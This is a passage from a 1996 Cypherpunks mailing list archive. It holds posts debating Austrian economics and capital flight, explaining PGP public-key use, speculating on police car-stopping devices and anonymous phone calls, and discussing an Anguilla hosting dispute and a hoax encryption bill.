iQCVAwUBMg/qSMVrTvyYOzAZAQGTtgQAr0TQQs7hkR8VvjhFUvOoLY4eScAI86Z7
qJ4HLHtniZExAueAYrL/fyh1tRi5RbuwtL49KdzhWF8d9nYNddzqc8O1ybb4yt3O
2TU96gDOfjFmv6mLTlWv+LfWIiYBXzNvGT1DYSeZO8atyPTW1BOX7ES/y3t1XPco
FDwfFR9NUM4=
=V0EI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 13 Aug 1996 23:49:02 +0800
To: cypherpunks@toad.com
Subject: Re: AW: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <199608130335.XAA17171@jekyll.piermont.com>
Message-ID: <yeJLsD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:
> The truly hysterical part is that Tim and I are both (from what I can
> tell) Austrians.

So was Adolf Hitler.  End of thread.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Wed, 14 Aug 1996 00:14:13 +0800
To: cypherpunks@toad.com
Subject: Re: Read; NOW
Message-ID: <TCPSMTP.16.8.13.7.12.44.2645935021.661652@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 >> 
 >>         Hi I'm Unix Code and have a few things to ask...(it may not go 
 >> with Cryptography but go ahead and read)

 > Sad.

 You read my mind.


 P.J.
 pjn@nworks.com


... Smell The Roses And Eventually You'll Inhale A Bee.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 14 Aug 1996 04:25:56 +0800
To: daw@cs.berkeley.edu (David Wagner)
Subject: Re: (Off Topic) Re: FCC_ups
In-Reply-To: <4upjp5$tc@joseph.cs.berkeley.edu>
Message-ID: <199608131233.HAA09323@homeport.org>
MIME-Version: 1.0
Content-Type: text


David Wagner wrote:

| The *real* challenge: how do you support sender- and recipient- anonymous
| phone calls with strong security?  Have fun.

	Caller calls 1-900-stopper via an international callback
service.  Caller uses Stopper to reach callee's phone number.  Callee,
taking responsibility for their own privacy, uses a forward that she
placed on a pay phone in Grand Central to a cheese box* in the
Seychelles to her real phone.

	Oh, you want authentication and MITM protection?

	Only caller<-->callee needs authentication, for the DH key that
they share for the call.  The other encryption is point to point
transport layer stuff; its nice that its there, but a MITM can listen
in, and only get one or two phone #s.  The chain is as strong as its
strongest link, namely the photuris style authentication of the
caller<->callee.

(A cheese box is a forwarder that works outside of the switch; call
#1, it dials #2, then connects it to line 1.  So called because the
first one the police found was in a cheese box.)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Tue, 13 Aug 1996 17:00:01 +0800
To: "'cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB88ED.98A382E0@groningen16.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:

>Been there, done that.  I repeat, the error that Bart made is
>assuming that because some US-source capital gets redirected 
>overseas, that the total amound of capital investment will 
>decline thus producing the wage drop he is fretting about.
>Unless he can show that foreign capital investment will not flow
>to US workers who are "forced" into working in industries where
>they have a comparative advantage, his argument must fail.  After
>all, I--like the economists Bart cite--think international free
>trade, the free flow of capital in persuit of the highest return
>and division of labor are a GOOD thing.

I also belief that international free trade, the free flow of capital in pursuit of the highest return and the division of labor are a GOOD thing. But in specific cases, I want to know the specific reasons. 
	You claim that I must show that foreign capital investment will not flow back to US workers. But in my original post, I said:

"Of course there are advantages also for the US (shareholders will get higher returns, trade will increase), but how can you proof that these advantages will offset the disadvantage of the lowered amount of capital in the US? "

You haven't answered this question yet. I don't claim that the U.S. is worse off when US capital moves abroad. I only ask: how can you proof that the US isn't worse off when US capital moves abroad? If you don't know the answer, there's nothing to be ashamed of. I don't know the answer either. That's why I asked my question, in the hope that somebody could provide the answer, so that in the future I would  be able to rebut arguments against the free movement of capital.

Another thing: I don't assume that the *total amount* of capital will be lowered in the US when US capital moves abroad. I assume that the amount of capital in the US will be *relatively lower*. So the wages will be *relatively* lower (lower than when the capital wouldn't have left the US), but not necessarily lower in any absolute sense. I thought this was obvious, but since Arun Mehta also misunderstood me, maybe I should have been more explicit here.


Bart Croughs










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 14 Aug 1996 04:52:31 +0800
To: Bart  Croughs <cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <199608131531.IAA19743@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:29 AM 8/13/96 +-200, Bart  Croughs wrote:
> In several posts I gave quotes from famous Austrian economists 
> that support my statement that according to Austrian economists 
> wages depend on the amount of capital invested. 

You are wrong, and Perry is wrong, or rather you are misleading,
and Perry is wrong.

The statement "wages depend on the amount of capital invested". 
can have several meanings.  In the hands of the Austrians, it 
does not have the implications that you force 
on it, and this is what Perry ought to be complaining about,
though instead he is saying something quite different.

Obviously if everyone saves more money and invests it those
things that they find most profitable, this will raise both
total income and wages.

Obviously if the government takes control of other peoples
capital, and directs it to those places it finds most 
socially desirable, this will lower both total income
and wages.   

I assume we are in agreement so far.

Next question:  If the government restrains american businessmen
from investing outside America, will this alter the balance of
power between capital and labor inside America, in favor of labor,
while altering it against labor outside America.

Well if nothing else changed, yes it would, and if Perry denied
this he was wrong.

But of course capital is international, because it belongs to 
individuals, not to nations.  Since large amounts of money flow
in and out of the US, a bureaucratic intervention that
aimed to have the desired effect would have to be extensive
and drastic, amounting to fascist style socialism.

Again, I assume we are in agreement on this.

Next question:

     Competition between labor in the third world, and labor in 
     the US.

In those cases where labor is a minor factor in production, then 
the price of labor would be dominated by the cheapest source of labor.

Or rather the cheapest source of labor that is not controlled
by a government that capriciously robs and enslaves.  At present
the cheapest such labor source is probably Thailand, which is not
actually all that cheap these days, but is one hell of a lot cheaper
than the US.

But for *desirable jobs*, such as software engineering, the jobs
that people are getting excited about, the cost of labor in Thailand
is roughly comparable to the cost in America.

The kind of jobs that are being taken by cheap unskilled Thai labor,
are the jobs you cannot get anyone to do in America except for 
illegal immigrants.

We would expect this, because in any area where labor is the dominant
factor of production (such as engineering) a large supply of cheap 
labor will very swiftly CREATE the necessary capital.

Again, you might point to India as an infamous counter example, since
engineering labor is vastly cheaper in India.

But this is not a result of supply and demand causing an extreme 
misdistribution of wealth between capital and labor, but is a reflection of
the fact that an engineer who is subject to the power of the Indian
government is not worth very much, as is demonstrated by the fact
that companies with Indian engineering teams often spend a lot of money
to get their employees out of India.

Demand for Indian programmers is less than supply not because capital
has somehow failed to flow to India, but because an engineer in India
is not free to produce the value that engineers elsewhere are free
to produce.

To say the same thing another way:  The primary capital for engineers
is that held within engineers heads.  Therefore controls on capital
flows are controls on engineers, which are likely to benefit those 
doing the controlling, not those controlled.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 14 Aug 1996 07:04:29 +0800
To: cypherpunks@toad.com
Subject: Re: PGP...
Message-ID: <199608131531.IAA19761@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:39 PM 8/13/96 +0100, sasa.roskar@uni-lj.si wrote:
> I'm confused.... if you don't want people to be able to read your
> email, you code it with PGP or other encoders... but why give away
> your key on your website to everyone? That makes your email readable
> to everyone... doesn't it? Oh well... I hope someone can explain this
> to me...

Public keys and private keys:

Private key only you know,  Public key everybody knows.

You use private key to sign, you use the other guys 
public key to encrypt, so that no one but him can read
the message, not even you, unless you kept the original
copy.

Public key does not decrypt.

Other guy uses his private key to decrypt the message you sent
him.

What one man knows, nobody knows, what two men know, everyone
knows.  If you had to share keys in order to communicate, the
keys would not stay secret very long.

Public key encrypts and verifies signature.  Private key encrypts
and signs.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 14 Aug 1996 05:53:43 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB88ED.98A382E0@groningen16.pop.tip.nl>
Message-ID: <Pine.SUN.3.91.960813081445.17718D-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 13 Aug 1996, Bart Croughs wrote:

> You claim that I must show that foreign capital investment
> will not flow back to US workers. But in my original post, I
> said:
> 
> "Of course there are advantages also for the US (shareholders
> will get higher returns, trade will increase), but how can you
> proof that these advantages will offset the disadvantage of the
> lowered amount of capital in the US? "
> 
> You haven't answered this question yet. I don't claim that the
> U.S. is worse off when US capital moves abroad. I only ask: how
> can you proof that the US isn't worse off when US capital moves
> abroad?

The movement of capital from the US was an *assumption* in Bart's
argument.  He has done nothing to show that it would in fact
happen.  When he proves that, they it would be reasonable to
expect me to offer proof that foreign capital will flow to the US.

It seems just as likely to me that US source capital will NOT 
flow overseas if it can be profitably invested in other US
industries that retain--or gain--competitive advantage from 
relative changes in productivity, supply and demand, or whatever.

In my experience, Americans are loathe to invest money overseas
unless it is highly profitable.  The reason is obvious.  They
understand--or think they understand--the rules here.  In 
historical terms, US investments have been more stable and safer
than investments overseas.  (Which is why, by the way, that the
US is the worlds largest tax haven in the world, but I digress.)

Thus, until Bart can support his highly dubious assertion that
capital that flows away from some non-competitive US industries
will necessarily flow offshore, there is no need for me to prove
that such a situation will probably lead to a counterbalancing
foreign capital flow into the US.  So far, Bart has not yet met
his burden of proof.

While I'm sure per capita capital investment is a *factor* in 
determining how high wages are, it certainly is not the only
factor.  It appears that Bart has fixated on this one to the
exclusion of other (probably more important) factors.

> If you don't know the answer, there's nothing to be ashamed of.

It is just this sort of unnecessary condescending snottiness that
create the clear impression that Bart is an asshole.  Perhaps he
is a fine chap and this is just his style, but I find it very
offensive an counter-productive in this discussion.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 14 Aug 1996 05:01:21 +0800
To: Bart Croughs <bart.croughs@tip.nl>
Subject: re: National Socio-Economic Security Need for Encryption Technology
In-Reply-To: <01BB88FA.42D3D100@groningen16.pop.tip.nl>
Message-ID: <Pine.SUN.3.91.960813084034.17718E@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

I've just had an insight with regard to Bart's ongoing capital 
debate.  In response to Perry's "green pylon" post, Bart wrote:

> I am saying that the fact that American workers are better paid
> than workers in Third World countries, can be explained for a
> large part by the fact that there is much more capital invested
> in the US than in Third World countries.

Bart's error lies in his confusion of the terms "captial" and
"capital investment."  While capital may be used to make capital
investments, there are other things it can be spent for as well
(wages, taxes, supplies, etc.).  

If Bart were to use the term "infrastructure" then it would be
clear that the ebb and flow of mere capital would have relatively
little to do with infrastructure influenced wages.  


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 14 Aug 1996 04:36:13 +0800
To: cypherpunks@toad.com
Subject: Re: Police prepare stunning end for high-speed car chases
In-Reply-To: <199608101504.RAA03459@internal-mail.systemics.com>
Message-ID: <199608131558.IAA08092@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Why don't they just have government access to car engines?  They
> could just require car manufacturers to include remote shutdown
> devices for the engines.

Well, then Carhacker arrives and shutdown any engine he can find :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Walberg <umwalber@cc.UManitoba.CA>
Date: Wed, 14 Aug 1996 03:42:00 +0800
To: sasa.roskar@uni-lj.si
Subject: Re: PGP...
In-Reply-To: <009A6C9C.E823907E.18@uni-lj.si>
Message-ID: <Pine.SOL.3.91.960813085749.9206A-100000@merak.cc.umanitoba.ca>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Nope.  With PGP you get 2 keys... One you keep secret (secret key), the 
other you make public (public key).  This way, if I want to send you a 
message, I don't need to talk to you to arrange for a session key or any 
passcodes, because PGP takes care of it.  

Say you wanted to send me a message...

You check your keyring (pgp -kv), but alas my key isn't there.  So you go 
to the keyserver (http://www-swiss.ai.mit.edu/~bal/pks-toplev.html), and 
retreive my key into a file (sean.asc).  Then you run pgp on it (pgp 
sean.asc) and it gets integrated into your keyring.

Now you type your message to me, and encrypt it with *my* public key, and 
*sign it with your private key* (pgp -sea message_to_sean.txt 0xD12B3419).  
Then you send it off to me.  (The 0xD12B3419 is my key id, and is 
displayed when you play with my key)

When I get it, I can export it to a file (message.asc), and run pgp on it 
(pgp message.asc).  Hey, it is signed, so I grab your key from the 
server, and pgp message.asc it again.  Since you encrypted it with my 
public key, _only my secret key_ can decrypt it, not even you can see 
it!  Also, since only you have access to your secret key, (if your 
signature checks out), I know it had to have been you who wrote the 
message and it was not tampered with.  (To be technically correct, I 
don't exactly know it was you, since I haven't trusted your key at this 
point, but we'll let that one slide)

- From this point, we can send and receive messages pretty easily, since we 
don't have to snarf keys.  It is also a bit easier than I make it out to 
be, because there are many automation tools out there for pgp.

Sean


On Tue, 13 Aug 1996 sasa.roskar@uni-lj.si wrote:

> I'm confused.... if you don't want people to be able to read your
> email, you code it with PGP or other encoders... but why give away
> your key on your website to everyone? That makes your email readable
> to everyone... doesn't it? Oh well... I hope someone can explain this
> to me...
> 
> Roki
> 

- ------------------------------------------------------------------
Sean Walberg                              umwalber@cc.umanitoba.ca
The Web Guy                  http://home.cc.umanitoba.ca/~umwalber 
UNIX Group, U. of Manitoba          PGP Key Available from Servers


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv
Comment: Processed by mkpgp, a Pine/PGP interface.

iQCVAwUBMhCMc982JgvRKzQZAQEjYAP/SWjf2z2lZjYzBKVRMo9fcaMEZXiQSal2
YRjhzIXI9LyOF+mEz+KvPscJEsKqwM0JQl64ZpYhvp2junRly292jflIpxsnSJSS
ZteKoFJ+JE2Rd4TMDHbojucAEN4ZrW0G5y6RUcT5ntkKKWCzjGnYhSeM//bb9mOe
ccq+A8aI9dY=
=j2nK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "I=(!isnum(self))" <geeman@best.com>
Date: Wed, 14 Aug 1996 05:12:46 +0800
To: David Kennedy <76702.3557@compuserve.com>
Subject: Re: Hoax: A ban on cryptography?
In-Reply-To: <960813023753_76702.3557_CHN38-4@CompuServe.COM>
Message-ID: <3210A92B.4C45@best.com>
MIME-Version: 1.0
Content-Type: text/plain


The "hoax" is a dramatization of possible legislation based on the 
language used in Di Fi's anti-bomb-making-rhetoric legislation proposed 
and passed in the Senate.

I posted that bill, and asked the list if anyone knew the status.  Tim 
May responded with the dramatized crypto version and asked "What is the 
status of _this_ bill" [emphasis added] .... and if I interpret 
correctly, the intent was

1. to chide
2. to dramatize

What if that WERE a bill being proposed??




David Kennedy wrote:
> 
> My mailer thinks the e$pam list pulled this from cypherpunks:
> 
> >>                                             S.1666
> 
>  Department of Commerce Authorization Act for Fiscal Year 1997 (Passed by the
>  Senate) <<
> 
> And this is bogus, and as far as I can tell not a typo, it's complete hokum.
> 
> S.1666 is an obscure bill about courts in Utah.
> 
> A search of http://thomas.loc.gov on "encryption" reveals the expected bills,
> PRO-CODE etc.
> 
> A search for the DoC Authorization Act reveals nothing, as far as I can tell
> this bill has not been drafted let alone passed. I don't know enough about how
> the DoC is funded to know if they get their own Authorization Act or receive
> authorizations piecemeal and by the reconciliation.
> 
> Again, this is bogus.
> 
> !^NavFont02F02350014QGHHG|MG~HG85QG87HI}2126




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 14 Aug 1996 02:03:11 +0800
To: <cypherpunks@toad.com
Subject: Re: [NOISE] "X-Ray Gun" for imperceptible searches
Message-ID: <199608131142.EAA03419@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim writes:

> I don't see how "remote scanning" of the population at large, without
> probable cause, is much different from the cops listening in from a
> distance with parabolic antennas. Both cases involve detection of signals
> emitted from the target. And yet such long-distance interception is not
> allowed without a warrant.

I vaguely remember another possibly relevant precedent, where a
judge ruled that a warrant was required before a thermal imager
could be used to look at a house suspected by the police of
being a (pot) grow house.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Tue, 13 Aug 1996 19:47:21 +0800
To: "'cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB88FA.25D2E3C0@groningen16.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger wrote:

>Perhaps I should start being more vicious when I'm using sarcasm.

>Nowhere in the writings of any Austrian economist will you find >anything
>claiming that the wages for a given job are linked to capital
>investment by the employer.

I already gave some quotes of Austrian economists in another post, but maybe you didn't read it, so here I go again:

	Henry Hazlitt in 'economics in one lesson' (p. 139): "The best way to raise wages, therefore, is to raise marginal labor productivity. This can be done by many methods: by an increase in capital accumulation - i.e. by an increase in the machines with which the workers are aided..."
	Murray Rothbard in 'the free market reader' (p. 31): "Wage rates are low in many foreign countries because capital equipment is small and technologically primitive. Unaided by much capital, worker productivity is far lower than in the United States."
	Lew Rockwell in 'the economics of liberty' (p. 26): "Wages are determined by the productivity of the individual laborer, which in turn is largely determined by the amount of capital invested per worker."
	
I could go on, but I think this will suffice.

As I already said in two of my other posts on this subject, when Austrian economists say that wages depend on the amount of capital invested, they mean on a regional/national level, not on the level of individuals.

Bart Croughs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Tue, 13 Aug 1996 19:40:56 +0800
To: "'cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB88FA.3EEDE440@groningen16.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger wrote:

>Bart Croughs writes:
>> I would be proud if I had discovered this axiom, but alas, I haven't.
>> It's an axiom that is generally accepted among austrian >>economists
>>(Rothbard, Hazlitt, etc). I don't know who actually discovered it.

>The truly hysterical part is that Tim and I are both (from what I can
>tell) Austrians.

>Perry

Well, if you are an Austrian, then maybe you should study the Austrians a bit more and write a bit less about them. In several posts I gave quotes from famous Austrian economists that support my statement that according to Austrian economists wages depend on the amount of capital invested. And all that you answer to this is that you're an Austrian yourself. What do you expect me to say? "Well, Austrian economists like Murray Rothbard and Henry Hazlitt think that wages depend on the amount of capital invested, but Perry Metzger disagrees and says he is an Austrian himself, so we can't conclude that according to Austrian economists wages depend on the level of capital invested?" For the moment, I think it's more reasonable to conclude that you don't understand the Austrians. But of course you can try to attack the arguments of the Austrian economists, and convince them that they are wrong and that they ought to adopt your point of view.


Bart Croughs









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Tue, 13 Aug 1996 21:46:51 +0800
To: "'cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <01BB88FA.42D3D100@groningen16.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger wrote:


>Bart Croughs writes:
>>When economists say that wages are determined by the amount of >>capital
>> invested, they mean on a regional/national level, not on the level of
>> individuals.

>So, you are saying that if everyone in the country spent their life
>savings on building giant green pylons, the capital investment would
>drive up everyone's wages? Wow! In fact, we could borrow money >from
>other countries to build more green pylons and drive up wages so >fast
>we could pay off the resultant debt!

>Perry

>(PS Please stop posting these things -- you may kill everyone >watching
>with laughter.)


No, I am not saying that if everyone in the country spent their life savings on building giant green pylons, the capital investment would drive up everyone's wages. You are suggesting that I'm saying this, but it's simply not true. This is called 'setting up a straw man'.

I am saying that the fact that American workers are better paid than workers in Third World countries, can be explained for a large part by the fact that there is much more capital invested in the US than in Third World countries. If you still don't understand this, I suggest you study my other posts on this subject, or better still, you study the works of the Austrian economists I've quoted before.


Bart Croughs





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 14 Aug 1996 05:23:08 +0800
To: cypherpunks@toad.com
Subject: Re: Police prepare stunning end for high-speed car chases
Message-ID: <199608131643.JAA19738@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:15 PM 8/12/96 -0700, Timothy C. May wrote:
>At 4:43 AM 8/13/96, jim bell wrote:
>>At 09:54 AM 8/12/96 -0700, Timothy C. May wrote:
>>
>>>
>>>(And I'm not ignorant of such technologies, having attended several of the
>>>Nuclear and Space Radiation Effects Conferences. I also played around with
>
>>Why would you need an "EM Cannon" for this?  Just string a 1-car-sized loop
>>of wire on the surface of a road, and off in the bushes hide a battery,
>>DC-to-Hi voltage DC converter and 20kv+ capacitor, and a vacuum switch or
>>some other switch arrangement.  When the car in question traverses the loop,
>>short the switch and the car will be blasted with 20,000 volt-turns of
>>induction.  Sure, most of it will pass harmlessly through the car's steel,
>>but even iron has a limited "mu" which means that every electrical device in
>>the car will be subjected to a certain amount of induced EMF, probably
>>enough to at least reset a few microprocessors and possibly even destroy 
them.
>
>Well, we're all operating based on speculation, as to intended modes of
>operation, what the contracts may ask for, what may eventually get
>delivered, etc.
>
>Certainly the described mode, that of a police car _pursuing_ another car,
>suggests a car-launched signal. Rewiring the nation's roads to include
>buried cables in anticipation of a future use would be pretty expensive!

Yes, it would be rather impractical for _that_ particular application.  


>(And if the cops can plan for a suspect/fleeing car to pass a specific
>location, low-tech solutions like laying a row of caltrops across the road
>will do much the same thing as "zapping" (which may not even work.))

The one place where this might be practical is on highways where these units 
can be placed fairly sparsely and still have a 

Even so, I think that non-police applications are more "interesting."



>As to high-voltage zapping, on this I am _extremely_ skeptical, at least as
>Jim's proposal above goes. Modern chips are equipped to deal with
>high-voltage, having electrostatic discharge (ESD) provisions. Voltages a
>lot higher than 20kv.

That's based on a certain source model.  You know, a specific capacitor in 
series resistance to limit the current.  However, if the current was induced 
from a low-impedance circuit, damaging currents might flow even if the EMF 
within a certain shielded loop in the car never exceeded a few tens of volts.

>
>And getting this hv signal in to the interior of the engine compartment,
>and past the various thermal and other shields would be a chore. Certainly
>the rubber tires will provide an _awful_ lot of insulation!

No, Tim, remember that I'm postulating an _inductively_ coupled system.  
Loop on ground, loops in the car, etc.  Magnetic coupling.  Conduction 
through car tires would be irrelevant the the functioning of this system. 
Wouldn't hurt it; wouldn't help it.

(Side note:  BTW, car tires are not non-conductive.  Check it out someday 
with a ohmmeter.)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 14 Aug 1996 02:28:04 +0800
To: cypherpunks@toad.com
Subject: Re: Rumors of death of Anguilla Data are greatly exaggerated
In-Reply-To: <Pine.LNX.3.91.960813094509.8391A-100000@offshore>
Message-ID: <Pine.LNX.3.91.960813094536.8354A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain




Greg Kucharo <sophi@best.com>
>  In the Swiss system, who dictates to the banks thier policies about who
> and what they can store?  Do the banks have enough influence to sway
> lawmakers?

It is not that any banks have something on some politician or anything
sneeky like you suggest. 

It is just that in a taxhaven, the government and the country are making
good money from the industry.  For example in Anguilla there might be
3,000 companies with the government averaging maybe $300 each per year, or
$1 mil/year (not sure of the real numbers). Also, the lawyers,
accountants, bankers, etc all make up a sizable part of the economy.  If
the Anguilla government ever make someone give information to the IRS it
would destroy this industry.  This would be bad for both the governments
revenue and the voters income, and so it is very doubtful they ever would. 

Also, the British want Anguilla to be a taxhaven.  They realize it is
a good way for a small country to make money.  They currently send
money to Anguilla every year, and if Anguilla can make plenty of money
from the taxhaven industry they won't need to.  So the British are
actually helping in a number of ways to get Anguilla established as 
a taxhaven.

  --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 14 Aug 1996 04:12:44 +0800
To: 76702.3557@compuserve.com>
Subject: Re: Hoax: A ban on cryptography?
In-Reply-To: <ae354cda0c021004454b@[205.199.118.202]>
Message-ID: <v03007815ae36385562b4@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:01 PM -0400 8/12/96, Timothy C. May wrote:
> At 2:37 AM 8/13/96, David Kennedy wrote:
> >My mailer thinks the e$pam list pulled this from cypherpunks:
<snip>

> Wake up.
>
> And for those who forward my stuff, please include appropriate disclaimers
> to your "spammees" that a) one should read things with an appreciation that
> a post may be tongue in cheek, b) that back-spamming to another list is not
> cool, and c) that I don't want to be bothered.

Yeah. What he said. I hope the cypherpunks list will accept my apologies.


There are firm rules about this to e$pam subscribers, and, while I haven't
had much occasion to enforce it lately, I might have to, which means
kicking the offenders off e$pam.

Strike one, Mr. Kennedy.

The rule is, if you're on a list with derivative content, particularly one
with as large a source-base as e$pam, do NOT reply directly to the source
list, in this case cypherpunks.

In the case of e$pam, there's a subsidiary discussion list, e$, which was
set up for this purpose. Use it. e$ has even gotten to the point where it's
generating its own traffic, now, which is nice.

To e$pam readers, if you want to talk on cypherpunks, or cyberia,
austrianecon, or any or the other 100 or so lists and newsgroups e$pam is
filtered from, sign on to the source list itself, read the traffic there
for a while, and *then* post something. In other words, become a *member*
of the list, and have some manners.

Again, I apologise for any inconvenience this may have caused to the
cypherpunks list.

BTW, I thought Tim's hoax was a good one, but, given that it hadn't shown
up anywhere else on the net, (and congress isn't in session :-)), it was
pretty easy to spot. It *did* give one pause, though.

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 14 Aug 1996 03:55:40 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla story...
In-Reply-To: <Pine.LNX.3.91.960813085122.8261A@offshore>
Message-ID: <Pine.LNX.3.91.960813095908.8354B-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



> From: sasa.roskar@uni-lj.si
> 
> Can someone please tell me the origin of this whole Anguilla story
> that's been going around a lot for the past few days... I just
> got onto the list two days ago, and I didn't catch the beginning
> of it... thanks,

In a nut shell, taxbomber.com was on my system in Anguilla.  He was
selling "camoflauge passports".  One David Evans of Bloomberg Business
News wrote an article where he quoted taxbombers page saying something
like "it is illegal to use these passports to open up bank accounts, but
there is little chance of getting caught". I got a call from my lawyer who
had seen the article (along with just about everyone else in Anguilla) and
he told me that was illegal in Anguilla and I should cancle the account. 
I did and taxbomber moved to another provider in another country. 

1) A number of cypherpunks are dissapointed that I did not fight to my
death to defend this guy. 

2) If the guy did not mention where his site was, the reporter probably
would never have mentioned Anguilla and me in the article.

3) If something is illegal in one country and legal in another, the guy
can move.  Going after the provider in one country will not stop him.

4) Anguilla is a taxhaven.  Anything that gives the country a bad name
hurts the clean business, where most of the money is.  

  --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 14 Aug 1996 05:47:34 +0800
To: cypherpunks@toad.com
Subject: Econopunks FAQ, Ver. 0.98
Message-ID: <2.2.32.19960813144043.00887ef8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


What is a Fair Price for a good or service?

There is no such thing as a Fair Price.  There are only the prices paid by
willing buyers and sellers.  These are generally called market prices.  Many
factors influence price including cost of production and product
characteristics but the only determinants are the desire of market actors to
